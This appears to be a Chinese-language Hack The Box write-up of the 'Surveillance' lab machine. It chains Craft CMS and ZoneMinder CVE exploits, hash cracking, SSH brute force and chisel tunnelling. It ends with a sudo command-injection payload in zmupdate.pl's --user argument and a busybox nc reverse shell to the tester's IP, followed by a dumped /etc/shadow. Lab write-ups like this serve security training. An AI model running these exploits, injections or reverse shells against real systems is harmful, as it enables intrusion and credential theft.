知识点:
craftcms-CVE-2023-41892;ZoneMinder-CVE-2023-26035;sudo-pl参数特性注入
Scan
┌──(kali㉿kali)-[~/Desktop/htb]└─$ sudo nmap -sC -sV -T4 -Pn 10.10.11.245[] password for kali:Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-12 06:50 ESTWarning: 10.10.11.245 giving up on port because retransmission cap hit (6).Nmap scan report for surveillance.htb (10.10.11.245)Host is up (0.30s latency).Not shown: 998 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)|_ 256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)80/tcp open http nginx 1.18.0 (Ubuntu)|_http-server-header: nginx/1.18.0 (Ubuntu)|_http-title: SurveillanceService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 151.97 seconds
Enum
Surveillance,看起来是个家里监控摄像头的网站,每周跟HTB学一个单词。
随便点点没东西,源码无果,fuzz子域名无果,扫目录得admin路由
gobuster dir -u http://surveillance.htb -w /usr/share/wordlists/wfuzz/webservices/ws-dirs.txt -x php -t 25
访问一波,看源码可以看到craftcms,上次打ACTF刚遇到过,有exp直接一把梭了
CVE-2023-41892
看主页时能发现版本4.4.14,谷歌搜到文章,修一下脚本,弹bash出来舒服一些
https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226
遍历目录,发现/var/www/html/craft/storage/backups有东西
解压完是个sql文件,大概看看可以把admin信息过滤出来,然后john秒了
'[email protected]','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec'┌──(kali㉿kali)-[~/Desktop/htb/Surveillance]└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256Using default input encoding: UTF-8Loaded 1 password hash (Raw-SHA256 [SHA256 128/128 AVX 4x])Warning: poor OpenMP scalability for this hash type, consider --fork=4Will run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusstarcraft122490 (?)1g 0:00:00:00 DONE (2023-12-12 07:14) 4.347g/s 15529Kp/s 15529Kc/s 15529KC/s stefon23..srflo1Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliablySession completed.
看一下/etc/passwd 有1000+的用户提出来放user,hydra爆一波(这里其实就两用户,直接手撸也行
hydra -L user -p starcraft122490 -vV -f ssh://10.10.11.245/
横向移动
当前用户稍微看了一下,sudo,suid啥都都没机会,看到本地有8080端口,猜测打内网,端口转发出来
ssh挂反向代理卡爆了,传个chisel打内网吧也卡的一笔,
chisel server --reverse --port 8888./chisel client 10.10.14.39:8888 R:1111:127.0.0.1:8080
看到是zoneminder的cms,搜一波:https://sploitus.com/exploit?id=1337DAY-ID-39149&utm_source=rss&utm_medium=rss
看到在msf里面可以使用该模块进行getshell:exploit/unix/webapp/zoneminder_snapshots
(这里vpn卡死了,换了个vpn重新打一下
打毛线run不起来,算了换一篇文章打,跑python吧,这里成功getshell了(太卡拉
https://github.com/rvizx/CVE-2023-26035
ROOT
sudo是可以免密执行*.pl的,这里提权跑不掉,看一看
zoneminder@surveillance:/usr/bin$ ls -la *.plls -la *.pl-rwxr-xr-x 1 root root 43027 Nov 23 2022 zmaudit.pl-rwxr-xr-x 1 root root 12939 Nov 23 2022 zmcamtool.pl-rwxr-xr-x 1 root root 6043 Nov 23 2022 zmcontrol.pl-rwxr-xr-x 1 root root 26232 Nov 23 2022 zmdc.pl-rwxr-xr-x 1 root root 35206 Nov 23 2022 zmfilter.pl-rwxr-xr-x 1 root root 5640 Nov 23 2022 zmonvif-probe.pl-rwxr-xr-x 1 root root 19386 Nov 23 2022 zmonvif-trigger.pl-rwxr-xr-x 1 root root 13994 Nov 23 2022 zmpkg.pl-rwxr-xr-x 1 root root 17492 Nov 23 2022 zmrecover.pl-rwxr-xr-x 1 root root 4815 Nov 23 2022 zmstats.pl-rwxr-xr-x 1 root root 2133 Nov 23 2022 zmsystemctl.pl-rwxr-xr-x 1 root root 13111 Nov 23 2022 zmtelemetry.pl-rwxr-xr-x 1 root root 5340 Nov 23 2022 zmtrack.pl-rwxr-xr-x 1 root root 18482 Nov 23 2022 zmtrigger.pl-rwxr-xr-x 1 root root 45421 Nov 23 2022 zmupdate.pl-rwxr-xr-x 1 root root 8205 Nov 23 2022 zmvideo.pl-rwxr-xr-x 1 root root 7022 Nov 23 2022 zmwatch.pl-rwxr-xr-x 1 root root 19655 Nov 23 2022 zmx10.pl随便看几个cat zmdc.plcat zmupdate.pl
这里root:root可以弱口令进数据库,看看有没有敏感信息
拿到密码ZoneMinderPassword2023,Config表里可以看到ZM_LD_PRELOAD
+-----+----------------------------------+-------------------------------------------------------------------------------+-------------+-------------------------------------------------------------------------------+--------------------------------------------------------------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------------------------------------+-----------------------------------------------------------------------------------------------------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+----------+---------+--------+-------------------------------------------------------+| Id | Name | Value | Type | DefaultValue | Hint | Pattern | Format | Prompt | Help | Category | Readonly | Private | System | Requires || images | 0 | 0 | 0 | || mail | 0 | 0 | 0 | ZM_OPT_EMAIL=1;ZM_OPT_MESSAGE=1 || 87 | ZM_HOME_ABOUT | 1 | boolean | yes | yes|no | (?^i:^([yn])) | ($1 =~ /^y/) ? 'yes' : 'no' | Whether to enable the ZoneMinder About menu. || images | 0 | 0 | 0 | || 3 | ZM_LANG_DEFAULT | en_gb | string | en_gb | string | (?^:^(.+)$) | $1 | Default language used by web interface |ZoneMinder allows the web interface to use languages other thanEnglish if the appropriate language file has been created andis present. This option allows you to change the defaultlanguage that is used from the shipped language, BritishEnglish, to another language| system | 0 | 0 | 0 | || 102 | ZM_LD_PRELOAD | | string | | /absolute/path/to/somewhere | (?^:^((?:/[^/]*)+?)/?$) | $1 | Path to library to preload before launching daemons |Some older cameras require the use of the v4l1 compatlibrary. This setting allows the setting of the pathto the library, so that it can be loaded by zmdc.plbefore launching zmc.| config | 0 | 0 | 0 | || web | 0 | 0 | 0 |
搞个恶意bash脚本,利用zmupdate.pl的参数提权,因为这里ZM_LD_PRELOAD会更改路径
busybox nc 10.10.14.115 443 -e shsudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/geq.sh)' --pass=ZoneMinderPassword2023
监听一下
┌──(kali㉿kali)-[~/Desktop/htb/Surveillance]└─$ nc -nlvp 9876listening on [any] 9876 ...idconnect to [10.10.14.115] from (UNKNOWN) [10.10.11.245] 51216uid=0(root) gid=0(root) groups=0(root)cat /etc/shadowroot:$y$j9T$bVNsNlTFFqsWiO2JYT0ZH/$ZzxFCnolnSpcSfQxaWNtq3BDIRPIVU9X.dm/ACzRAl9:19651:0:99999:7:::daemon:*:19213:0:99999:7:::bin:*:19213:0:99999:7:::sys:*:19213:0:99999:7:::sync:*:19213:0:99999:7:::games:*:19213:0:99999:7:::man:*:19213:0:99999:7:::lp:*:19213:0:99999:7:::mail:*:19213:0:99999:7:::news:*:19213:0:99999:7:::uucp:*:19213:0:99999:7:::proxy:*:19213:0:99999:7:::www-data:*:19213:0:99999:7:::backup:*:19213:0:99999:7:::list:*:19213:0:99999:7:::irc:*:19213:0:99999:7:::gnats:*:19213:0:99999:7:::nobody:*:19213:0:99999:7:::_apt:*:19213:0:99999:7:::systemd-network:*:19213:0:99999:7:::systemd-resolve:*:19213:0:99999:7:::messagebus:*:19213:0:99999:7:::systemd-timesync:*:19213:0:99999:7:::pollinate:*:19213:0:99999:7:::sshd:*:19213:0:99999:7:::syslog:*:19213:0:99999:7:::uuidd:*:19213:0:99999:7:::tcpdump:*:19213:0:99999:7:::tss:*:19213:0:99999:7:::landscape:*:19213:0:99999:7:::usbmux:*:19374:0:99999:7:::lxd:!:19374::::::dnsmasq:*:19459:0:99999:7:::matthew:$y$j9T$oipsGfEBv1fcFV1uQ6Bl4.$44F4J5xtr2V4oN.zY0OB.8r3p1TllAlaMivft5R8o18:19647:0:99999:7:::mysql:!:19619:0:99999:7:::zoneminder:$y$j9T$.wNHpksMBEdFIQZZJTsDp/$r43uCJLrmfIgv4ZnMiyhMqykrru7aoPIuunhUrTTxp/:19647:0:99999:7:::fwupd-refresh:*:19670:0:99999:7:::_laurel:!:19670::::::
原文始发于微信公众号(搁浅安全):HTB-Surveillance(Medium)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论